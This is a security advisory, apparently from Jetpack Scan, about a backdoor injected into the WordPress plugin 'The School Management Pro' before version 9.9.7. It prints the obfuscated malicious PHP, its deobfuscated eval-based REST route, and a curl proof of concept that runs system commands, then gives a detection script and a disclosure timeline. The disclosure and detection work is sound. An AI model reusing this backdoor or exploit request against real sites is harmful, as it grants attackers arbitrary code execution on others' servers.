Backdoor found in The School Management Pro plugin for WordPress

Versions before 9.9.7 of the WordPress plugin “The School Management Pro” from Weblizar contain a backdoor allowing an unauthenticated attacker to execute arbitrary PHP code on sites with the plugin installed. If you have an earlier version installed on your site, we recommend upgrading to version 9.9.7 or later immediately. This is a critical security issue.

Read on for the full details.

Details:

A part of the job here at Jetpack Scan is supporting our hosted WordPress business by checking suspicious files found on sites we host. Usually this is due to a file being flagged by one of our signatures, or that the site owner has found something suspicious and wants our opinion. As is the nature of things, sometimes these files are benign, some are false positives, and some are new malware strains or variations that need more work classifying properly.

Sometimes, however, what we get is more interesting altogether.

A couple of weeks ago, one such incident occurred. The WordPress.com escalated support team contacted us about some obfuscated, obviously malicious code found in a plugin on several sites.

}
$_fc = eval("\x65\x76\x61\x6c(\x67\x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "\x6c\x61\x74" . "\x65\x28\x62"."\x61\x73\x65\x36"."\x34\x5f\x64\x65\x63\x6f\x64\x65\x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs='" . str_repeat(chr(0x29), 3)."\x3b");
class WLSM_Crypt_Blowfish_DefaultKey

After two rounds of trivial deobfuscation, this gives:

add_action( 'rest_api_init', function() {
        register_rest_route(
                'am-member', 'license',
                array(
                        'methods'  => WP_REST_Server::CREATABLE,
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

The code itself isn’t all that interesting: it’s an obvious backdoor injected into the license-checking code of the plugin. It allows any attacker to execute arbitrary PHP code on any site with the plugin installed, as can be seen in the proof of concept below:

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713

This is the kind of thing we often see in nulled plugins, so often that we have already covered a similar case in a previous post. Our first assumption was that this was also the case here: that the site owners had installed the plugin from a shady source.

However, we were assured that the installed plugins had been obtained directly from the vendor. The vendor quickly confirmed this, and removed the offending code after being made aware of its presence.

We have tried to get more information from the vendor about when the backdoor was injected, which versions are affected, and how the code ended up in the plugin in the first place. This effort has been unsuccessful, as the vendor says they do not know when or how the code got into their software.

In our hosted systems we have seen the backdoor in versions going back at least to 8.9, but since we do not have any clear information about when it first appeared, we have to assume that any version before 9.9.7 is affected.

Detecting and alerting on the issue is further complicated by the plugin being distributed under a number of different slugs, often containing the version number. In our hosted systems we have seen at least these variants:

  • school-management
  • school-management-v*
  • school-management-pro
  • school-management-pro-*
  • the-school-management

The free version from the WordPress.org plugin repository does not contain the licensing code, and is also not affected by this backdoor.
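As an added example (not code from Jetpack or from the vendor), the check below walks a wp-content/plugins directory, matches the slug variants listed above, reads each plugin's Version: header, and flags copies that are older than 9.9.7 or that contain indicators taken from the obfuscated and deobfuscated listings earlier in the post. The slug regex that widens the post's wildcards, the 2 MiB per-file read cap, and the sample plugin tree it scans are constructed for the demo.

```python
"""Added example (not Jetpack's or the vendor's code): scan a WordPress
wp-content/plugins directory for copies of The School Management Pro that
are older than the fixed 9.9.7 release or carry the injected license-check
code, across the slug variants listed in the post."""
import os
import re
import tempfile

FIXED_VERSION = (9, 9, 7)    # first release confirmed clean in the post
MAX_BYTES = 2 * 1024 * 1024  # assumption: cap per-file reads at 2 MiB

# Directory names the plugin has been seen under; the post's "*" wildcards
# are widened to [\w.-]* here (assumption).
SLUG_RE = re.compile(
    r"^(?:school-management(?:-v[\w.-]*|-pro(?:-[\w.-]*)?)?|the-school-management)$"
)

# Source-level indicators taken from the obfuscated and deobfuscated listings.
INDICATORS = {
    "am-member/license route": re.compile(
        r"register_rest_route\(\s*['\"]am-member['\"]\s*,\s*['\"]license['\"]"),
    "eval of blowf parameter": re.compile(
        r"eval\(\s*\$args\[\s*['\"]blowf['\"]\s*\]\s*\)"),
    # hex-escaped "eval(" that opens the obfuscated stage
    "hex-escaped eval wrapper": re.compile(r'eval\(\s*"\\x65\\x76\\x61\\x6c'),
}

VERSION_RE = re.compile(r"^[\s/*]*Version:\s*(\d+(?:\.\d+)*)", re.M)


def parse_version(text):
    """Return the plugin header 'Version:' value as an int tuple, or None."""
    m = VERSION_RE.search(text)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def scan_plugin(plugin_dir):
    """Inspect one plugin directory; return slug, version and list of reasons."""
    version, reasons = None, []
    for root, _dirs, files in os.walk(plugin_dir):
        for name in sorted(files):
            if not name.endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                text = fh.read(MAX_BYTES)
            if version is None and root == plugin_dir:
                version = parse_version(text)  # header lives in a top-level file
            rel = os.path.relpath(path, plugin_dir)
            reasons += [f"{label} in {rel}" for label, rx in INDICATORS.items() if rx.search(text)]
    if version is None:
        reasons.append("no version header found; treat as affected")
    elif version < FIXED_VERSION:
        reasons.append("version %s is older than 9.9.7" % ".".join(map(str, version)))
    return {"slug": os.path.basename(plugin_dir), "version": version, "reasons": reasons}


def scan_plugins(plugins_dir):
    """Report every matching plugin directory that has at least one reason."""
    findings = []
    for entry in sorted(os.listdir(plugins_dir)):
        path = os.path.join(plugins_dir, entry)
        if os.path.isdir(path) and SLUG_RE.match(entry):
            result = scan_plugin(path)
            if result["reasons"]:
                findings.append(result)
    return findings


def build_sample_tree(plugins_dir):
    """Constructed sample data for the demo; not real plugin contents."""
    def write(rel, body):
        path = os.path.join(plugins_dir, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)

    header = "<?php\n/**\n * Plugin Name: The School Management Pro\n * Version: %s\n */\n"
    # old release carrying (only the prefix of) the obfuscated stage
    write("school-management-pro-9.9.4/school-management-pro.php", header % "9.9.4")
    write("school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php",
          r'<?php $_fc = eval("\x65\x76\x61\x6c(\x67\x7a" . "...");' + "\n")
    # old release with no indicator hit: flagged by version alone
    write("school-management/school-management.php", header % "9.5.0")
    # fixed version number, but the deobfuscated route is still present
    write("school-management-v9.9.7/the-school-management.php", header % "9.9.7" +
          "add_action( 'rest_api_init', function() {\n\tregister_rest_route(\n"
          "\t\t'am-member', 'license',\n\t\tarray( 'callback' => function( $request ) {\n"
          "\t\t\t$args = $request->get_params();\n\t\t\teval( $args['blowf'] );\n\t\t} ) );\n} );\n")
    # genuinely clean copy and an unrelated plugin: neither is reported
    write("the-school-management/the-school-management.php", header % "9.9.7")
    write("akismet/akismet.php", "<?php\n/**\n * Plugin Name: Akismet\n * Version: 5.0\n */\n")


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_plugins(tmp)


if __name__ == "__main__":
    for f in demo():
        print(f["slug"], f["version"], *f["reasons"], sep="\n  ")
```

On a real host, call scan_plugins() on the site's wp-content/plugins directory instead of the constructed tree. Indicator hits count regardless of the version header, since a copy can be renamed or re-versioned without the injected code being removed; the PHP warning in the proof of concept above, which names WLSM_LC.php and a chain of eval()'d code, is a further indicator to look for in PHP error logs.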

Timeline

2022-05-04: The escalated WordPress.com support team discovers the injected code and reaches out to Jetpack Scan to analyze and verify the finding. After confirming that it is a backdoor, they notify the vendor.

2022-05-05: The vendor confirms that the injected code is indeed in their distribution, and provides us with version 9.9.7, from which the backdoor has been removed. We confirm it is clean.

2022-05-06: The vendor actively distributes version 9.9.7 to their customers and encourages them to update.

2022-05-10: The vendor replies to our additional questions about whether they know when the backdoor was added, but says they do not know. They do provide a previous version, 9.9.4, which includes the backdoor.

Conclusion

We recommend that any site with any version earlier than 9.9.7 of The School Management Pro installed upgrade immediately.

At Jetpack, we work hard to make sure your websites are protected from these types of vulnerabilities. We recommend that you have a security plan for your site that includes malicious file scanning and backups. Jetpack Security is one great WordPress security option to ensure your site and visitors are safe.

Credits

This research was a cooperation between the WordPress.com escalated support team with Nic Sevic, Thom Stackhouse and Joshua Goode, and Jetpack Scan with Harald Eilertsen and Fioravante Cavallari. Also thanks to Benedict Singer for feedback and corrections.

Harald Eilertsen

Harald is a Certified Systems Security Professional (CISSP) with a wide background from software development and the security industry. He has a Master of Science in analog microelectronics from the Norwegian University of Science and Technology (NTNU), and has worked for companies such as Norman, Tandberg and Cisco before joining the Jetpack Scan team at Automattic.
